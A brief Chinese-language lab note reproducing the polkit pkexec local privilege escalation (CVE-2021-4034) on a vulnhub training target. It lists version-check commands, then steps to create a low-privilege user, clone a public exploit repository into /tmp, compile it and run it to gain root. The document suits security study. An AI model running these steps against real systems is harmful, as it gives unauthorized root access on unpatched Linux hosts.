漏洞影响2009年5月至今的所有polkit版本
此工具是linux系统预装工具,所有存在此工具的linux系统都会收到影响
判断是否有这个漏洞:
dpkg -l policykit-1 #debain,ubuntu
rpm -qai policykit-1 #centos,redhat
本次环境是vulnhub的lampiao(脏牛)靶机
复现:
新建用户:
useradd -d /home/test -m test #新建用户
passwd test #改密码
su test #切换用户
cd /tmp #进入tmp目录
下载exp(exp下载到了tmp目录下):
git clone https://github.com/berdav/CVE-2021-4034.git #不能下载时,就自己复制链接下载,在传到目标靶机
cd CVE-2021-4034/
make #编译
./cve-2021-4034 #运行
成功提权: